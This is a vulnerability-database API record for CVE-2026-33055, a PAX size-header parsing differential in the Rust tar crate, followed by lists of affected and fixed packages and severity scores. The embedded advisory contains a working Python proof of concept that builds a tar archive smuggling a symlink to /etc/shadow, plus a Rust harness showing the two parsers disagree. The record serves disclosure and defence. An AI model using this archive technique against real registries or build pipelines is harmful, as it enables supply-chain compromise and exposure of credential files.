Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/23202?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23202?format=api", "vulnerability_id": "VCID-ehdy-7aak-r3bt", "summary": "tar-rs incorrectly ignores PAX size headers if header size is nonzero\n### Summary\n\nAs part of [CVE-2025-62518](https://www.cve.org/CVERecord?id=CVE-2025-62518) the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.\n\nHowever, it was missed at the time that this project (the original Rust `tar` crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.\n\nThe problem here is that *any* discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.\n\nIn this case, the tar-rs (Rust `tar`) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go `archive/tar`) unconditionally use the PAX size override.\n\n\n### Details\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n### PoC\n\n(originally posted by https://github.com/xokdvium)\n\n\n> I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:\n\nIt seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by `astral-tokio-tar` but not by `tar-rs`.\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n```python\n#!/usr/bin/env python3\nB = 512\n\n\ndef pad(d):\n r = len(d) % B\n return d + b\"\\0\" * (B - r) if r else d\n\n\ndef hdr(name, size, typ=b\"0\", link=b\"\"):\n h = bytearray(B)\n h[0 : len(name)] = name\n h[100:107] = b\"0000644\"\n h[108:115] = h[116:123] = b\"0001000\"\n h[124:135] = f\"{size:011o}\".encode()\n h[136:147] = b\"00000000000\"\n h[148:156] = b\" \"\n h[156:157] = typ\n if link:\n h[157 : 157 + len(link)] = link\n h[257:263] = b\"ustar\\x00\"\n h[263:265] = b\"00\"\n h[148:155] = f\"{sum(h):06o}\\x00\".encode()\n return bytes(h)\n\n\nINFLATED = 2048\npax_rec = b\"13 size=2048\\n\"\n\nar = bytearray()\nar += hdr(b\"./PaxHeaders/regular\", len(pax_rec), typ=b\"x\")\nar += pad(pax_rec)\n\ncontent = b\"regular\\n\"\nar += hdr(b\"regular.txt\", len(content))\nmark = len(ar)\nar += pad(content)\n\nar += hdr(b\"smuggled\", 0, typ=b\"2\", link=b\"/etc/shadow\")\nar += b\"\\0\" * B * 2\n\nused = len(ar) - mark\nif used < INFLATED:\n ar += b\"\\0\" * (((INFLATED - used + B - 1) // B) * B)\nar += b\"\\0\" * B * 2\n\nopen(\"smuggle.tar\", \"wb\").write(bytes(ar))\n```\n\n`tar-rs` and `astral-tokio-tar` parse it differently, with `astral-tokio-tar` skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).\n\n```rust\nuse std::fs;\nuse std::path::PathBuf;\n\nfn sync_parse(data: &[u8]) {\n println!(\"tar:\");\n let mut ar = tar::Archive::new(data);\n for e in ar.entries().unwrap() {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\nasync fn async_parse(data: Vec<u8>) {\n println!(\"astral-tokio-tar:\");\n let mut ar = tokio_tar::Archive::new(data.as_slice());\n let mut entries = ar.entries().unwrap();\n while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option<PathBuf> = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\n#[tokio::main]\nasync fn main() {\n let path = std::env::args().nth(1).unwrap_or(\"smuggle.tar\".into());\n let data = fs::read(&path).unwrap();\n sync_parse(&data);\n async_parse(data).await;\n}\n```\n\n```\ntar:\n regular.txt Regular\n smuggled Symlink -> /etc/shadow\n\nastral-tokio-tar:\n regular.txt Regular\n```\n\n### Impact\n\nThis can affect anything that uses the `tar` crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses `astral-tokio-tar` to parse, but cargo uses `tar`.", "aliases": [ { "alias": "CVE-2026-33055" }, { "alias": "GHSA-gchp-q4r4-x4ff" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/581879?format=api", "purl": "pkg:cargo/tar@0.4.45", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:cargo/tar@0.4.45" }, { "url": "http://public2.vulnerablecode.io/api/packages/1056288?format=api", "purl": "pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.70.0%252Bdfsg1-9" }, { "url": "http://public2.vulnerablecode.io/api/packages/1056290?format=api", "purl": "pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.86.0%252Bdfsg1-1~bpo13%252B2" }, { "url": "http://public2.vulnerablecode.io/api/packages/938928?format=api", "purl": "pkg:deb/debian/rustc@1.92.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.92.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1059655?format=api", "purl": "pkg:deb/debian/rustc@1.93.1%2Bdfsg1-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.93.1%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1067629?format=api", "purl": "pkg:deb/debian/rustc@1.94.1%2Bdfsg1-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.94.1%252Bdfsg1-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938858?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.45-1?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.45-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938855?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.45-2?distro=trixie", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.45-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/995266?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.45-2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.45-2" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/581878?format=api", "purl": "pkg:cargo/tar@0.4.44", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:cargo/tar@0.4.44" }, { "url": "http://public2.vulnerablecode.io/api/packages/938927?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/994782?format=api", "purl": "pkg:deb/debian/rustc@1.48.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4khp-kevq-xff5" }, { "vulnerability": "VCID-69zd-gcvx-fuhr" }, { "vulnerability": "VCID-7ap9-xghv-dbdy" }, { "vulnerability": "VCID-d8yv-ngej-1kf7" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-f4bw-5erp-4uc6" }, { "vulnerability": "VCID-fu46-5dhv-ckdt" }, { "vulnerability": "VCID-j9kg-rd4y-y7by" }, { "vulnerability": "VCID-pbjz-th4w-tqgb" }, { "vulnerability": "VCID-pvm9-wtbx-1ubx" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" }, { "vulnerability": "VCID-wdu6-3vph-aqb7" }, { "vulnerability": "VCID-wpe1-jr23-duhh" }, { "vulnerability": "VCID-y25s-c64z-57a6" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.48.0%252Bdfsg1-2" }, { "url": "http://public2.vulnerablecode.io/api/packages/938925?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/994783?format=api", "purl": "pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2" }, { "url": "http://public2.vulnerablecode.io/api/packages/938929?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/1056289?format=api", "purl": "pkg:deb/debian/rustc@1.85.0%2Bdfsg3-1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.85.0%252Bdfsg3-1" }, { "url": "http://public2.vulnerablecode.io/api/packages/995263?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.26-1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-88p2-xuah-2ygr" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.26-1" }, { "url": "http://public2.vulnerablecode.io/api/packages/938854?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.26-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-88p2-xuah-2ygr" }, { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.26-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/995264?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.38-1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.38-1" }, { "url": "http://public2.vulnerablecode.io/api/packages/938852?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.38-1?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.38-1%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/938856?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.43-4?distro=trixie", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.43-4%3Fdistro=trixie" }, { "url": "http://public2.vulnerablecode.io/api/packages/995265?format=api", "purl": "pkg:deb/debian/rust-tar@0.4.43-4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-ehdy-7aak-r3bt" }, { "vulnerability": "VCID-qj1y-b8m1-hyfm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/rust-tar@0.4.43-4" } ], "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01406", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01404", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01411", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01418", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01417", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01412", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01403", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01409", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00011", "scoring_system": "epss", "scoring_elements": "0.01396", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01893", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01847", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01851", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01861", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04022", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04008", "published_at": "2026-05-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33055" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055" }, { "reference_url": "https://github.com/alexcrichton/tar-rs", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/alexcrichton/tar-rs" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946" }, { "reference_url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33055" }, { "reference_url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://rustsec.org/advisories/RUSTSEC-2026-0068.html" }, { "reference_url": "https://www.cve.org/CVERecord?id=CVE-2025-62518", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" }, { "value": "5.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/" } ], "url": "https://www.cve.org/CVERecord?id=CVE-2025-62518" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480", "reference_id": "1131480", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225", "reference_id": "1135225", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225" }, { "reference_url": "https://github.com/advisories/GHSA-gchp-q4r4-x4ff", "reference_id": "GHSA-gchp-q4r4-x4ff", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gchp-q4r4-x4ff" } ], "weaknesses": [ { "cwe_id": 843, "name": "Access of Resource Using Incompatible Type ('Type Confusion')", "description": "The product allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type." } ], "exploits": [], "severity_range_score": "4.0 - 8.1", "exploitability": "0.5", "weighted_severity": "7.3", "risk_score": 3.6, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ehdy-7aak-r3bt" }